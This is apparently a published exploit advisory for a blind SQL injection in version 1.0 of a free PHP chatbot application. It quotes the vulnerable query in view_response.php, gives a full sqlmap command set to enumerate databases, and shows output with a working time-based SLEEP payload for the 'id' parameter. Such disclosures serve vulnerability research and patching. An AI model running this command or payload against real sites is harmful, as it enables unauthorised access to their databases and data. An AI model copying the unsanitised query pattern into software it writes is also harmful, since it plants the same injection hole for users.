ChatBot Application with a Suggestion Feature version 1.0 suffers from a remote blind SQL injection vulnerability.
6e5561beff591b12af8e2999685edb97e47363e65c7da33e3edf5c64ff8b548d
# Exploit Title: ChatBot Application with a Suggestion Feature 1.0 - 'id' Blind SQL Injection
# Date: 05/05/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15316/chatbot-app-suggestion-phpoop-free-source-code.html
# Version: 1.0
# Tested on: XAMPP, Linux
# Vulnerable Code
line 4 in file "/simple_chat_bot/admin/responses/view_response.php"
$qry = $conn->query("SELECT * from `response_list` where id = '{$_GET['id']}' ");
# Sqlmap command:
sqlmap -u 'http://localhost/simple_chat_bot/admin/?id=0&page=responses/view_response' -p id --level=5 --risk=3 --dbs --random-agent --eta
# Output:
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=0' AND (SELECT 9931 FROM (SELECT(SLEEP(5)))Etug)-- bfDF&page=responses/view_response